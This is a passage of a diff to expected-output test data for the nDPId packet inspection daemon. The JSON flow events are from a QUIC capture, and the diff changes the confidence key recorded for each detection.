-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1621431576853,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431576853,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFQlAAH4RYPOokEAFgPgYAchgAbsFTnq0wv8AAB0IQJ4IpSc1aNIANwCZc\/3f1l3vg6YZeTNl87IqhJ27nCcuea\/qvb41mLVKUuBIV5pQThWzegD9xWcQRyZSfI7h79NE\/YUm1oAXrFrCT3TkbHGJwP3KBfTu3orp0WCwk0l4MiqV0DClWwpW\/1NKhCfuNkry0QNEwg5pHZb\/vSK\/s\/a8cF3aIAtN637iUzqyfqlQEpk\/TZCqI5tarhaQzSJ4uSDtYWWFCyQdGrPQxx36Ty1apquBRh7LpqS3HzTGXWn1iXBjJTo2oNMvvW5LV8Ozlo+ykFGxJKjaz+YxvcqhT3PapUN200W+09yqn+UXzRAxphjhSHCFmnFGaD1Cmd2AoqB2RODbBdfTfnO0p+5IwFP+QXYCSCui22wiXW71huSyPhBNTXtdjBnB0aI7RQe9BP\/8cTXCHdvaiOWZbEqGPCEZpsonT5okRzLwKKitPO9lmE6w6XZFQF+AwHMppJIEs+V4\/+utYSZGmsenl8sXZa5i3PEJK+hPz90wGXsjo2vNoA9zBeskKRP31j+JnkVWm6+SeE\/XRpijNighimBNH4TAc1SkFEUDYnbj8\/dvi6K8\/bLnWnO5ZEd5IeQ8y49ijX2T\/6gXriwCkzq1N2nFeCTG9C25WLUIBOWbIgjk\/+rRxff3yEw3Cf0EsWpP57l3vuNRPUUM9k6QGTA+VA1VqhI5cq5zqw3USveM+coEGcG1czX5cJsPCLcDVcPmIyqMPFVLeTlqZ1e993EuXFPOAn7\/j9tmZpD0F7W3EcJhPNBgFb8I9AuIGuTFhDSHGIm1+udcX3QtCfqh23mMSbz03kWO\/8Pc52Aj8EV9FAJ++uk6cpcxlqReXfPX+orcIqI07HBHS4wZHhfWa4II0L8ZmZqChXEQh4SRM5QraEDhiDgHu2Wr\/XrZ+LTSmy6GJnpyoczRJsxWL+SqSeaD+rxyEDOOHfzLTMkqwLlJdA5\/bX9M6EkuaQ7fp6odWxiaULg9HlTuvy4eSg1Y+BunaS6DHxROL7RTUmCWNUYbZhsn7mUOPPTqltAXc+wYwHbtEmsu3lqjKjPQEUq39uJ2DkvHyNGNu15OR5jgmIUl9ra0cSZwJSuq26MGcArS+trbqUaRVMldH30c\/MqtoFc0+kTZkdf2zXVOuhlhIHDu5oivOacupqIMRXqQvnAj9e3Szh7HtmF\/ZTqRfgMooySSCala0vsE5E7aOt7QgfLg9p0zs80j5g\/fIFZXq6e3PRZGJlOduO5u\/FTED0nlkOStAfZ1cLQvrXot9UJE83tMH4DWSX6zM9DnOiDmars1HY1Qu1gozfortWRStAAQrzDmILzgi+tPIyMlRG1aiOK3rlgWXZwKS5kvAXGSQQPfQS9NlLwCrZHQT69B6mWCBPUBWh8QsOqv76k4Jv46eHsK0hoU92HUqhOqgk09EQBCnGI\/zWgYxU42nbsJkiMdKoLbVeUFxPtnCdHCWdIgtqELcoRLCnlfyj6fLmSJose7rxid75fKfwhgi9zbXUZHzUBVvrHaO1NpbexSUM4VztLAkHYegA4mZsAUTMXrwzehYvktbWieQfVgMvUC0tW6eNm9CeJQwCRuFen27D7bblWN395kZABQJz2J7igCkCcenO9hEEn4u3aBeGpUqZzmS+2bCxYqraA8Fpg0t+bmHW17tRBn26Wlj\/IBR5faBKZzUPN15J\/fmg\/PqeAeDRy7HA\/FEBoAg9iJEv3ZRqMQz+xrjOv+G3\/dDpiheVzILmxX+EOrazHQswKRcYoP3gCsVHHcszDooALZcZ+BQQzftaJeRTwIbx4z"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00629{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1621431760040,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431760040,"pkt":"AAAAAAAAAAEAdQOrCABFAAVizP5AAH4RzUyokEAFTFMoV+GnAbsFTrfUwP8AAB0I5zcbzyTN1LMAAEU085Brpbyr+2jh\/NyWKUdWZh90hrqs\/JUnV06AWtlVkrCYYR00Pib5lXHukuswI4apeXXYya1wVBFr8DpPUkWiGoC3sbaSvRZYYp3tBYoEJo8YIhwPSxXaYFfD6\/RsiM+Yfb2H1k8FEvnnpg0sxOjmgBY+O4W2eynZXgCIIV38HEw+wEDjZA2kk7L82T1bQYySl7HgNdHSquKu8SR8yPJcn8V2uMxsDXUCsucyI4\/wZySpci4W3UjA6hpswJQYsYncOuLPMzriT9nvkw9UXOlgzjajXpXUd\/JGwl0HyONFBLUkUDKjyeQYXeGyQW3ma\/zK00kJSnfXLEQC\/601KkV16N6qrZ0v5OR1cTLHDvXTzpfU721p0tTNZjXqZrYlC5ApJ869tkJz0gvSI815yu\/1aSemEd+xL\/8oRmyBCIllJq+YA3vMuW0w4\/T5JBaRPvDu30haGDWrTxiRXXYta2\/CdqVvbjVJtiTfDkkC1bYeze+3Ah85\/uP8diiaa9AR8AKCUBgQdJ3mENPMmAvvqo\/B+ziY39N9FFetzWHMNvAzeRNXDdkoheBvxSnvCsDetHFzuAVJDYI\/bys388LAY+YcZ2PLXZ4i6IMVrySiDR3dBi9J6Xh51PGX4vbMQUcpCXv4G342VJ1caxMpMC0WKSvRN\/bqWlMQ+RF7oj6QAUiBi3SwgLkBBChaMRaz6hO+99tY2xzKs6MRliASieiMP732ghruPSLQ+wkW3s1+76mAlzozUQwzPbS1PGTHvC010AWavdSmg87MToOsLUXgD4HnFyn2h8N\/zN0Y9kv+731G9nuRhhLm0utvCdYH7hRWyLbk56OLgd+REvXXwQQQpBwKlWgfOj3W3\/5qVvPq3e+dNdLj6fyCzr2ipjs5XbBlzIlCeM\/X82w9I6lQbG2MB8pWKZKtLdibzQ7WTlOJqcJ2CMdQhgH9A1bdiqPv\/gr5wXKSRUUJATME8kPSQNByUdL7GTcCBNzP+8ZUAcsI0bM2tgOdWh0suQyngSZKgXVLvx6wGBu+1wF\/mC2T9fk50gp1zDgTxJjhtLxXk3ylwvBp311b2znJyXpnhAKEllhdOQr6Tr8CSn8jAdZm+gC\/EWrlnqxU3bjZ8FRmLt5X6O3NKJ6DoHTIz7S4IKZcp2EE\/qrF59y9ofjxJIdx0H9xpLiBAZaTSw63h0cJs0HrTSWerWgqOhr90\/R76Qs8o\/fRdj0KfsMdcJ0uNDyxtoSBePmAxqS4gAyc7hFHKfA41dW9prrj3pJtaB8l6RP06jKTbRRFyZuDe6A9VYcgFUSM2zXSaVtYhvAVkemhrcWVfhKpPRpQAijaZZT4By9Fc75mrUC8\/jXvh0rSqRaZF4w8CZTfLoxB2+fbxhXS\/y2T4EIEyiUFCUG8C69qtn9uZOcZ3P61zXWpjuvaUy96vWpLSu3t+0FalFdLvnA8VuSf2lAEClkALW3Dl4vLfiIlNB4emRks21g88RhpsKHyXLOxAkbKh50EqqlhB1mllDYGWbm\/4xaT9s3Zafiaab8TWadT6jVEwkNzekV\/0AbiRBOXrL6jktjB5jxq4zn7l3VgtdxFNAmFQYDibYgJ3De9KSyXejEY1rNESvwittZgupicY+Dm1OETIost\/wF\/G3hHSgdvFNBHmfdSw4NKdZwUuGXdqN5OH9Rvmel41BzbqTaqBCe1ri0\/9znww4gdI1VUL9A6rt9xHmn2T0Eu019PmuUftYMzGJ+Wp8LyQupxLYsYZE2Wjo3Ainf0KmDOU7NxfIE1yCKzpfBd"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r11---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r11---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 